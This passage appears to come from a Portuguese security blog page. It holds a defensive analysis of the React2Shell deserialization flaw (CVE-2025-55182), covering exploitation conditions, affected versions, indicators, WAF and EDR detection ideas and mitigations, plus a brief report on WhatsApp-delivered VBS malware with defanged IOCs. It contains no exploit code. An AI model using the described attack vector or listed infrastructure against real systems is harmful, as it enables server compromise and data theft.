Os alertas foram precisos e mencionaram explicitamente a tentativa de injeção de comando, exploração vinculada ao CVE-2025-55182 e a identificação do endpoint alvo. Isso confirma a eficiência e necessidade de agentes monitoradores atualizados e competentes para a segurança de servidores abertos à Internet, uma vez que não é possível prever o surgimento de toda vulnerabilidade capaz de destruir o sistema alvo.

5. Conclusões

A vulnerabilidade CVE-2025-55182 apresenta características típicas de uma falha altamente explorável, combinando baixa complexidade, impacto máximo, exploração silenciosa e ampla superfície de ataque (React + Next.js).

Os resultados laboratoriais evidenciam que assinaturas tradicionais não são suficientes para detectar o ataque — detecção comportamental em nível de processo e rede é determinante para identificar anomalias — e explicam o curto intervalo de tempo entre divulgação e exploração, pela facilidade desta, com grupos ativamente desenvolvendo variantes.

Ambientes que dependem apenas do antivírus nativo ou ferramentas desatualizadas ficam completamente expostos.

6. Mitigação e Recomendações

Para mitigar a vulnerabilidade CVE-2025-55182, recomenda-se:

Atualizar o Next.js para versão 16.0.7 ou superior – Sendo a ação mais crítica e urgente para todos os ambientes de produção.
Monitorar eventos ou tentativas de execução de payload – Implementar regras de detecção em plataformas EDR para identificar requisições POST suspeitas direcionadas a Server Functions.
Implementar Web Application Firewall (WAF) com regras para detectar chaves com ‘$’ e ‘:’ já que são características de ataques abusando dessa vulnerabilidade.
Manter logs detalhados de requisições POST e analisar regularmente para atividades suspeitas.
Realizar auditorias de segurança em aplicações React/Next.js para identificar potenciais pontos de exposição.

Caso necessário, é possível atribuir um limite de recursos ao processo do Node.js, isolar em containers (Hardening) ou feature flags para desativar parcialmente a RSC onde não for necessária.

REFERÊNCIAS

[1] NIST National Vulnerability Database, “CVE-2025-55182,” NVD, 3 de dezembro de 2025. [Online]. Disponível em: https://nvd.nist.gov/vuln/detail/CVE-2025-55182. [Acessado em: 10-Dez-2025].

[2] msanft, “CVE-2025-55182,” GitHub, 4 de dezembro de 2025. [Online]. Disponível em: https://github.com/msanft/CVE-2025-55182. [Acessado em: 10-Dez-2025].

[3] CJ Moses, “China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182),” Amazon Security Blog, 4 de dezembro de 2025. [Online]. Disponível em: https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/. [Acessado em: 10-Dez-2025].

[4] Rapid7, “React2Shell (CVE-2025-55182) – Critical unauthenticated RCE affecting React Server Components,” Rapid7 Blog, 4 de dezembro de 2025 (lançamento); 8 de dezembro de 2025 (atualização). [Online]. Disponível em: https://www.rapid7.com/blog/post/etr-react2shell-cve-2025-55182-critical-unauthenticated-rce-affecting-react-server-components/. [Acessado em: 10-Dez-2025].

Artur Spadoni

React2Shell: Análise Aprofundada da Vulnerabilidade no React

ATUALIZAÇÃO em 11/12/2025:

O valor do EPSS saltou de 13,9% em 08/12/2025 para 76,01% HOJE 11/12/2025.

Com um valor de CVSS 10,0 é fundamental que sejam aplicadas as medidas de resolução imediatamente.

1. Introdução

No início de dezembro de 2025, uma vulnerabilidade de severidade crítica, apelidada de React2Shell, emergiu, abalando a comunidade de desenvolvimento web.

Identificada oficialmente como CVE-2025-55182, trata-se de uma falha de Execução Remota de Código Não Autenticada ou Unauthenticated Remote Code Execution (Unauthenticated RCE) e recebeu a pontuação máxima de 10.0 no Common Vulnerability Scoring System (CVSS), sinalizando um risco extremo para uma vasta gama de aplicações modernas.

Uma Execução Remota de Código Não Autenticada é uma vulnerabilidade que permite a um atacante executar comandos ou código arbitrário em um servidor remoto sem necessidade de possuir credenciais válidas ou autenticação prévia.

Diferentemente de vulnerabilidades que exigem que o invasor esteja logado ou tenha acesso autorizado ao sistema, uma Unauthenticated RCE pode ser explorada por qualquer pessoa com acesso à rede (geralmente a internet), tornando-a extremamente perigosa.

A vulnerabilidade reside no coração dos React Server Components (RSC), uma tecnologia cada vez mais adotada em frameworks populares como Next.js, afetando potencialmente mais de 40% dos principais websites da Internet.

Este artigo oferece uma análise técnica aprofundada da React2Shell, detalhando seu mecanismo de exploração, o impacto que pode causar e as medidas essenciais que as equipes de segurança e desenvolvimento devem tomar para mitigar esta ameaça iminente.

2. O Mecanismo da Exploração: Desserialização Insegura

A React2Shell NÃO é uma vulnerabilidade comum. Sua periculosidade reside na simplicidade de sua exploração.

Um atacante, sem qualquer tipo de autenticação, pode comprometer completamente um servidor vulnerável através de uma única requisição HTTP POST maliciosamente elaborada.

A raiz do problema está na forma como os React Server Components lidam com a desserialização de dados.

Quando um cliente envia uma requisição para um endpoint que utiliza Server Functions, o React transforma os dados recebidos em chamadas de função do lado do servidor.

Durante este processo, a vulnerabilidade permite que um payload manipulado seja desserializado sem as devidas validações de segurança. Isso cria um caminho direto para que o atacante injete e execute código arbitrário com os mesmos privilégios do processo do servidor Node.js, abrindo as portas para um comprometimento total do sistema.

2. Análise de Impacto: As Consequências de uma Exploração Bem-Sucedida

Uma vulnerabilidade de RCE pré-autenticação é o ativo mais cobiçado no arsenal de um agente malicioso. No caso da React2Shell, as consequências de uma exploração bem-sucedida são catastróficas e podem se manifestar de várias formas:

Comprometimento Total da Infraestrutura: O atacante obtém controle total sobre o servidor, permitindo acesso irrestrito ao sistema de arquivos, roubo de credenciais e a instalação de backdoors para acesso persistente.
Exfiltração de Dados Sensíveis: Uma vez dentro do sistema, o invasor pode acessar e exfiltrar informações críticas, como bancos de dados de clientes, segredos de aplicação (chaves de API, tokens), propriedade intelectual e lógica de negócios.
Movimento Lateral na Rede: O servidor comprometido torna-se um ponto de pivô, a partir do qual o atacante pode lançar novas ofensivas contra outros sistemas internos, bancos de dados e recursos na nuvem, expandindo o alcance do ataque por toda a organização.
Ataques de Ransomware e Interrupção de Negócios: Com controle total, os atacantes podem implantar ransomware, criptografando dados vitais e exigindo um resgate, ou simplesmente interromper as operações, causando perdas financeiras e danos à reputação.

2. Descrição Técnica

A vulnerabilidade decorre de desserialização insegura no protocolo Flight, mecanismo responsável por transportar estruturas dos Server Components entre cliente e servidor.

Ao receber um payload malicioso, o servidor interpreta dados arbitrários como referências de função, o que permite execução remota de código com privilégios equivalentes ao processo Node.js.

Condições de exploração

Não exige autenticação;
Não exige cookie, API key ou token;
Pode ser explorada por qualquer atacante com acesso ao endpoint RSC;
Vetor principal: HTTP POST com conteúdo Flight manipulado.

Impacto técnico

Execução remota de código (RCE);
Execução arbitrária de processos no host ou container;
Exfiltração de dados sensíveis;
Movimento lateral;
Possível comprometimento total de infraestrutura (quando mal configurada).

3. Sistemas Afetados

3.1 React e bibliotecas centrais

Conforme registros do NVD:

Pacote	Versões vulneráveis	Versões corrigidas
`react-server-dom-webpack`	19.0.0 a 19.2.0	19.0.1+, 19.1.2+, 19.2.1+
`react-server-dom-parcel`	19.0.0 a 19.2.0	19.0.1+, 19.1.2+, 19.2.1+
`react-server-dom-turbopack`	19.0.0 a 19.2.0	19.0.1+, 19.1.2+, 19.2.1+

3.2 Frameworks afetados

Next.js versões 15.x e 16.x;
Associado adicionalmente ao CVE-2025-66478, conforme documentação CISA/NVD.
React Router com RSC;
Expo;
RedwoodJS;
Waku;
Plugins de integração RSC para Vite, Parcel e Turbopack.

4. Vetor de Ataque e Indicadores de Exploração

4.1 Vetor primário

POST /<endpoint-rsc>  
Content-Type: application/json  
Payload malformado contendo blocos Flight manipulados

4.2 Indicadores observáveis

Logs de erro do Flight referentes a parsing inesperado;
Picos súbitos de CPU em processos Node.js;
Tentativas de criação de processos via child_process.spawn/exec;
Comunicação egressa para hosts desconhecidos
Criação de artefatos suspeitos em /tmp em containers Linux

4.3 Atividade Maliciosa Confirmada

Organizações de segurança reportaram:

Scanners em larga escala buscando endpoints RSC;
Explorações automatizadas visando Next.js exposto;
Comprometimento de clusters Kubernetes negligentemente isolados;
Uso da vulnerabilidade para implantação de webshells e reverse shells.

5. Mitigação

**5.1 Patching obrigatório**

Aplicar imediatamente as versões corrigidas dos pacotes React RSC e atualizar aplicações Next.js para releases não vulneráveis.

5.2 Controles compensatórios (temporários)

Regras de WAF para bloquear payloads suspeitos do protocolo Flight;
Monitoramento agressivo de tráfego de egressão;
Habilitar logs completos de chamadas RSC;
Bloquear criação de processos filho por Node.js quando possível;
Reforçar políticas noexec em diretórios temporários.

5.3 Defesa em profundidade

Execução do Node.js com mínimo privilégio;
Isolamento adequado de containers e namespaces;
Mecanismos RASP como camada adicional;

6. Avaliação de Risco

A vulnerabilidade é considerada Crítica, nível máximo no CVSS 10.0, devido a:

Exploração ativa confirmada globalmente
Ausência de barreiras de autenticação
Impacto direto em aplicações amplamente adotadas (React/Next.js)
Possibilidade de comprometimento total do ambiente

É altamente recomendável priorizar a correção em ambientes expostos à internet.

6.1. Sobre o EPSS e CVVS Score para React2Shel

Métrica	Valor
Score Inicial	0.46%
Score Atual	13.86% (8 de dezembro de 2025) 76,01% (atualizado em 11/12/2025)
Percentil	Em atualização contínua

O Problema: Uma Discrepância Crítica

Existe uma divergência significativa entre o CVSS (10.0 – Crítico) e o EPSS (13.86%), que revela uma limitação importante dos sistemas de scoring automatizados.

É importante entender que o EPSS é um “indicador retardado” (lagging indicator).

Embora tenha subido de 0.46% para 13.86% desde o início da publicação do CVE, ainda está muito abaixo do que os níveis reais de exploração justificariam, porque:

Exploração Ativa em Andamento: Grupos de ameaças vinculados à China já foram observados explorando a vulnerabilidade (AWS)
Liderança em Bug Bounty: É o #1 CVE mais explorado na plataforma HackerOne
Remediação Acelerada: Organizações estão remediando em menos de um dia em média
Escala Massiva: Mais de 12 milhões de sites potencialmente vulneráveis.

O Que Isso Significa

O EPSS demonstra que sistemas de scoring automatizados podem não acompanhar o ritmo de exploração em tempo real. Isso ressalta a importância de:

Não depender apenas de scores automatizados para priorização de vulnerabilidades críticas.
Usar feedback em tempo real de comunidades de segurança (bug bounty, threat intelligence).
Considerar o contexto operacional além dos scores numéricos

Referências:

Portal informativo sobre a vulnerabilidade: https://react2shell.com/
NVD / NIST – CVE-2025-55182
https://nvd.nist.gov/vuln/detail/CVE-2025-55182
CVE.org – CVE Record CVE-2025-55182
https://www.cve.org/CVERecord?id=CVE-2025-55182
NVD / NIST – CVE-2025-66478 (Next.js)
https://nvd.nist.gov/vuln/detail/CVE-2025-66478
React Team. React Server Components Documentation.
https://react.dev/reference/react-server
React Flight Protocol (repositório oficial).
https://github.com/facebook/react/tree/main/packages/react-server
Vercel. Next.js App Router and React Server Components.
https://nextjs.org/docs/app/building-your-application/rendering/server-components
MITRE. CWE-502: Deserialization of Untrusted Data
https://cwe.mitre.org/data/definitions/502.html
OWASP. Deserialization of Untrusted Data
https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data

Adriano Cansian

diario.cylo.com.br/author/adriano-cansian/

WhatsApp: a nova porta de entrada

Nos últimos dias, foi identificado novamente um ataque veiculado via WhatsApp Web envolvendo o envio de um arquivo VBS (Visual Basic Script) altamente ofuscado. A ofuscação é feita por meio de códigos ASCII convertidos com a função Chr() e concatenados em tempo de execução, o que dificulta a análise estática do arquivo.

Após a desofuscação do script, foi possível recuperar os endereços de rede utilizados e toda a cadeia de ações executadas. O VBS cria pastas temporárias em C:\ (como C:\temp), gera arquivos .bat e realiza o download de múltiplos componentes, incluindo Python em modo “embedded”, ChromeDriver e um arquivo MSI. Esses artefatos são então utilizados para montar um ambiente capaz de executar scripts adicionais, automatizar o navegador e, potencialmente, interagir com sessões do WhatsApp Web ou outras aplicações sensíveis.

Um ponto relevante é que o arquivo VBS foi prontamente detectado pela solução XDR, pois o WhatsApp Web salva o anexo localmente em uma pasta temporária antes mesmo de o usuário clicar em “baixar” ou abrir o arquivo. Isso permite que mecanismos de segurança baseados em monitoramento de disco interceptem o artefato ainda no início da cadeia de ataque.

Principais IOCs:
Domínio: 193[.]36[.]109[.]208[.]host[.]secureserver[.]net
IP: 208[.]109[.]36[.]193

Domínio: empautlipa[.]com
IPs: 172[.]67[.]155[.]220, 104[.]21[.]50[.]29

Yuri Augusto

Graduado em Ciências Biológicas, descobri que minha mãe estava certa e voltei para a área de tecnologia. Realizei a segunda graduação em Análise e Desenvolvimento de Sistemas, e iniciei minha carreira como Analista de Suporte, prestando suporte técnico à infraestrutura de TI com ênfase em tecnologias Microsoft.

Atualmente trabalho com resposta a incidentes, análise de ameaças, monitoramento de ambientes e mitigação de riscos em infraestruturas corporativas.

diario.cylo.com.br/author/yuri-augusto/